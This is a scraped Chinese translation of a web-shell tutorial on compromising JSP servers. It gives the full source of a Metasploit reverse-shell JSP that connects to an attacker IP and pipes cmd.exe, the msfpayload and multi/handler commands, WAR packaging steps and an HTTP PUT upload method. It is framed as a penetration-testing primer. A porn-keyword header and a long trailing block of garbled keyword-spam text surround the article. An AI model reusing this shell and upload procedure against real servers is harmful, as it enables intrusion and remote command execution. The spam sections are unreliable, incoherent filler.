国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

外國大牛教你玩轉(zhuǎn)JSP Shell

安全 應(yīng)用安全
現(xiàn)如今,使用JSP開發(fā)的的網(wǎng)站越來越多,很多大公司的數(shù)據(jù)中心也會使用這種架構(gòu)。在筆者的滲透經(jīng)驗(yàn)之中,拿下JSP網(wǎng)站的主要方法就是上傳Shell從而執(zhí)行命令。在本文中筆者將舉兩個JSP shell code的例子,和幾個常見的上傳shell的方法。

什么是WebShell

WebShell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個網(wǎng)站后,通常會將這些asp或php后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在一起,然后就可以使用瀏覽器…

[[114327]]

現(xiàn)如今,使用JSP開發(fā)的的網(wǎng)站越來越多,很多大公司的數(shù)據(jù)中心也會使用這種架構(gòu)。在我的滲透經(jīng)驗(yàn)之中,拿下JSP網(wǎng)站的主要方法就是上傳Shell從而執(zhí)行命令。在下面的文章中我將舉兩個JSP shell code的例子,和幾個常見的上傳shell的方法。

JSP Shell

對于不怎么熟悉Web Shell的人來說,我前文指的JSP Shell是一段"Java Server Page"這段代碼可以允許任何指令在服務(wù)器上執(zhí)行。一般來說,Shell通過一個HTML from來接受需要執(zhí)行的指令。下面,我對于每個例子都會給出基本的Shell代碼。我個人比較喜歡用,Metasploit JSP shells,因?yàn)樗哂泻芎玫姆€(wěn)定性和清爽的界面。

基本JSP shell

這是一個最簡單的 JSP Shell,使用方法如下。

(1)保存為cmd.jsp上傳到服務(wù)器。

(2)訪問這個頁面,執(zhí)行命令。

外國大牛教你玩轉(zhuǎn)JSP Shell

Metasploit JSP Shell

在攻擊中使用Metasploit JSP Shell大概需要六步。

(1)使用msfpayload創(chuàng)建一個cmd.jsp

(2)上傳cmd.jsp到服務(wù)器

(3)運(yùn)行Metasploit multi-handler

(4)訪問cmd.jsp

(5)獲得shell

(6)如果是windows,升級到meterpreter shell

創(chuàng)建一個JSP Shell可以使用如下的命令,LHOST代表了自己主機(jī)的地址。

ruby C:\framework\msf3\msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.100.110 LPORT=53 R > cmd.jsp

上面的指令成功執(zhí)行之后,Metasploit會生cmd.jsp的源代碼,有些情況下你可能需要修改其中的一些變量來繞過防火墻的檢測。

  1. <%@page import="java.lang.*"%>   
  2. <%@page import="java.util.*"%>   
  3. <%@page import="java.io.*"%>  
  4.  <%@page import="java.net.*"%>  
  5.  <% class StreamConnector extends Thread  
  6.  {   
  7. InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os )   
  8. {   
  9. this.is = is;   
  10. this.os = os;   
  11. }   
  12. public void run()  
  13. {   
  14. BufferedReader in = null;  
  15. BufferedWriter out = null;  
  16. try { in = new BufferedReader( new InputStreamReader( this.is ) );  
  17. out = new BufferedWriter( new OutputStreamWriter( this.os ) );  
  18. char buffer[] = new char[8192];  
  19. int length;  
  20. while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )   
  21. {   
  22. out.write( buffer, 0, length );   
  23. out.flush();  
  24. }  
  25. }  
  26. catch( Exception e ){} try { ifin != null ) in.close();  
  27.  if( out != null ) out.close();   
  28. }   
  29. catch( Exception e ){}  
  30.  }   
  31. try { Socket socket = new Socket( "192.168.100.110", 53 );  
  32.  Process process = Runtime.getRuntime().exec( "cmd.exe" );  
  33. new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  
  34.  ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();   
  35. }   
  36. catch( Exception e ) {}  
  37.  %> 

之后就是把cmd.jsp文件上傳到目標(biāo)服務(wù)器。假設(shè)上傳后的地址是,http://www.victim.com/cmd.jsp之后就開始運(yùn)用Metasploit multi handler,打開msfconsole使用如下命令。

use exploit/multi/handler setg LHOST 192.168.100.110 setg LPORT 53 setg PAYLOAD java/jsp_shell_reverse_tcp setg SHELL cmd.exe exploit –j -z

最后訪問 http://www.victim.com/cmd.jsp ,msfconsole就會受到反彈回來的鏈接。

你可以通過以下的指令訪問這條shell

sessions –I 1

如果目標(biāo)主機(jī)是一個windows主機(jī),可以用以下的指令吧shell升級成一個meter-preter shell

sessions –U 1

打包JSP Shells

有些情況下,需要把cmd.jsp打包成一個WAR文件(比如JBoss).在windows環(huán)境下,需要如下幾步。

(1)安裝JDK

(2)新建 WEB-INF目錄

(3)在 WEB-INF/web.xml 中輸入如下內(nèi)容

  1. <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
  2.  xsi:schemalocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">  
  3. <servlet-name>Command</servlet-name>   
  4. <jsp-file>/cmd.jsp</jsp-file>  
  5. </web-app> 

(4)使用如下命令可以把jsp,文件打包成jar包。

"C:\Program Files (x86)\Java\jdk1.6.0_26\bin\jar.exe" cvf cmd.war WEB-INF cmd.jsp

Shell上傳

使用PUT方法

PUT方法是HTTP的一個擴(kuò)展協(xié)議,允許用戶向服務(wù)器上傳文件。很久以前這個漏洞還是很流行的。

基本所有掃描工具都可以,掃描到這個漏洞,也可以通過ncat之類的工具找到這個漏洞。我比較喜歡

使用burp,使用burp檢測這個漏洞,需要如下幾步。

(1) 進(jìn)入repeater tab選項(xiàng)卡

(2) 構(gòu)造如下文件頭

PUT /path/cmd.jsp HTTP/1.1 Host: Content-Length: 0

(3) 在文件頭下面連續(xù)輸入兩次回車之后輸入JSP shell code。

(4) 在burp下提交構(gòu)造好的包。

上傳方式

一般情況下,網(wǎng)站對于上傳文件的類型都有很嚴(yán)格的控制,但攻擊者仍然有幾種方法來繞過他們。這里就不詳細(xì)敘述了。

發(fā)布WAR文件

有一些服務(wù)器軟件會使用到WAR,其中一些會提供用戶上傳WAR文件的接口。有些會允許用戶使用一些外部源。Josh Abraham 寫了一些jBoss metasploit exploits,叫做jboss_maindeployer。這里還有一篇比較不錯的paper來講針對jBoss的攻擊。

文件共享

有的時候,網(wǎng)站的主目錄會被部署到ftp服務(wù)器上,如果能猜到密碼或者是ftp使用了默認(rèn)的密碼。就可以通過ftp來上傳shell。

其實(shí)這是一篇科普文。最后對于文件上傳技巧的敘述比較冗長有刪節(jié)。

原文地址:https://www.netspi.com/blog/entryid/126/hacking-with-jsp-shells

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2018-03-22 10:26:13

2018-05-12 16:26:17

互聯(lián)網(wǎng)VPC子網(wǎng)

2011-08-10 15:58:12

WPS符號欄

2024-04-09 12:08:51

Next組件Next.js

2021-05-18 14:42:55

PythonMySQL

2010-07-27 09:17:23

服務(wù)器整合

2015-03-23 12:33:28

2013-09-10 10:20:12

數(shù)據(jù)大數(shù)據(jù)大數(shù)據(jù)應(yīng)用

2013-03-13 09:56:10

2012-04-17 14:33:00

牛排New iPad

2011-01-28 15:47:15

webOS 2.1

2009-06-16 09:06:37

JavaMailJSP

2023-08-18 14:39:02

2021-12-10 08:39:50

SQLPLUS Oracle 數(shù)據(jù)庫

2019-05-16 15:54:59

人工智能AI

2014-08-19 09:10:45

IT運(yùn)維

2011-06-09 11:39:04

噴墨打印機(jī)技巧

2016-11-17 16:58:01

華為 手機(jī)

2018-02-07 16:05:59

MySQLMyRocksRocksDB

2020-04-26 19:12:29

shell腳本Linux
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

亚洲自拍高清视频网站| 女人高潮特级毛片| 欧美99在线视频观看| 一本大道久久a久久综合婷婷| 999精品视频在线| 韩国av一区二区三区在线观看| 国产免费一区二区三区在线能观看| 日韩精品一页| 亚洲乱亚洲乱妇无码| 最新日本在线观看| 欧美日韩视频专区在线播放| 友田真希在线| 亚洲国产一二三| 中文字幕av专区| www激情久久| 中文字幕无码精品亚洲35| 久久99热99| 午夜啪啪福利视频| 美女一区二区视频| 日韩欧美第二区在线观看| 国产日韩欧美高清免费| 久久国产一区| 日韩在线观看一区二区| 奇米视频888战线精品播放| 日韩在线视频观看| 91视频成人免费| 久久se这里有精品| 影音先锋欧美资源| 美国一区二区三区在线播放| 水蜜桃一区二区三区| 免费人成精品欧美精品| 亚洲美女网站18| 国产精品一区二区x88av| 91精品国产毛片武则天| 国产黄色精品网站| 久久精品免费一区二区| 欧美国产一区视频在线观看| 三级a在线观看| 一区二区三区在线视频播放| 在线中文字幕视频| 欧美丰满美乳xxx高潮www| 女人高潮被爽到呻吟在线观看| 在线精品国产成人综合| 高清一区二区三区| 国产精品免费福利| 国内精品久久久久久久97牛牛| 欧美男人的天堂| 国产成人亚洲综合色影视| 五月婷婷激情久久| 亚洲国产精品影院| 国产一二三区在线观看| 夜夜嗨av一区二区三区四区| 免费观看成人www动漫视频| 国产自产女人91一区在线观看| 亚洲黄色天堂| 国产欧美日韩网站| 亚洲午夜免费电影| 18视频在线观看| 欧美成人免费观看| 欧美99在线视频观看| 最近中文字幕免费mv| 自拍偷在线精品自拍偷无码专区| 久久经典视频| 中文字幕亚洲无线码a| 国产高清久久| 草b视频在线观看| 黄色精品一区二区| 免费观看欧美大片| 成人午夜在线视频一区| 国产福利91精品一区| 尤物视频免费在线观看| 亚洲人成在线免费观看| 国产精品videosex性欧美| 天天干天天色天天爽| 亚洲成人777| 欧美与亚洲与日本直播| 成人免费xxxxx在线观看| 国产99久久精品| 国内在线精品| 欧美男插女视频| 另类天堂av| jizzjizzji欧美| 亚洲成人免费网站| 成人av国产| 9色porny| 欧美日韩一区不卡| 亚洲欧美日本国产| 日韩欧美精品久久| 亚洲综合男人的天堂| 在线观看爽视频| 亚洲最大成人网色| 国产精品久久久久永久免费观看| 暧暧视频在线免费观看| 91亚洲精品在线| 国产精品国产a| 欧美www.| 日韩精品资源| 色综合色狠狠天天综合色| 999久久精品| 人妻激情另类乱人伦人妻| 欧美日韩国产高清一区二区| 久久99国内| 国产视频在线视频| 一区二区欧美日韩视频| 校园激情久久| 国产精品久久久久久久龚玥菲 | 色天使综合视频| 国产精品三区四区| 亚洲男人的天堂一区二区| 欧美日韩精品免费观看视完整| 久久av一区二区| 日韩欧美视频一区二区三区| 欧美色图婷婷| 免费看的黄色大片| 日韩精品中文字幕在线播放| 国产欧美成人| 免费一级在线观看| 国产精品普通话| 亚洲品质自拍视频| 国产精品久久久网站| 国产成人黄色片| 日韩在线小视频| 99久久精品免费看| 人人精品久久| 欧美性潮喷xxxxx免费视频看| 亚洲成av人影院在线观看| 日韩精品乱码av一区二区| 污污在线观看| 亚洲一区二区在线免费观看| 日韩成人av在线播放| 激情都市一区二区| 性欧美hd调教| 狠狠97人人婷婷五月| 欧美国产日韩xxxxx| 国产精品久久久久久妇女6080| 色视频在线观看福利| 日韩欧美一区二| y111111国产精品久久婷婷| 日韩精品在线视频| 国产精品午夜免费| 国产成人ay| 91大神在线资源观看无广告| 国产日韩精品视频| 精品美女久久久久久免费| 亚洲一区激情| 欧美精品一线| 三年中国中文在线观看免费播放| 欧美放荡的少妇| 日韩av电影天堂| 超碰在线cao| 一卡二卡三卡视频| 欧美激情2020午夜免费观看| 1000部国产精品成人观看| 黄色不卡一区| 国产在线日本| 色噜噜狠狠色综合网| 亚洲欧美国产日韩中文字幕| 95精品视频在线| 欧美日韩一区二区三区不卡视频| 久久精品五月婷婷| 激情五月开心婷婷| 国产性生活免费视频| 羞羞视频网站在线免费观看| 欧美激情一级精品国产| 亚洲精品v日韩精品| 亚洲国产精品91| bl在线肉h视频大尺度| 日韩av中文字幕第一页| 91av福利视频| 在线亚洲一区二区| 国产一区二区三区在线观看免费| 午夜视频一区二区在线观看| 校园春色欧美| 麻豆映画在线观看| 日韩av快播网址| 欧美一区二区三区在线电影| 成人午夜在线播放| 手机在线电影一区| 麻豆理论在线观看| 大陆一级毛片| 一本色道久久99精品综合| 色综合视频网站| 欧洲色大大久久| 国产成人av一区二区三区在线| 日韩欧美美女在线观看| 国内小视频在线看| 免费特级黄毛片| 男人天堂成人网| 国产日韩欧美视频在线| 国产午夜精品免费一区二区三区| 亚洲地区一二三色| 成人午夜激情影院| 综合av在线| www.丝袜精品| 欧美aaa免费| 在线免费国产| 日本在线观看a| 亚洲国产婷婷香蕉久久久久久99 | 蜜桃视频中文字幕| 黄频视频在线观看|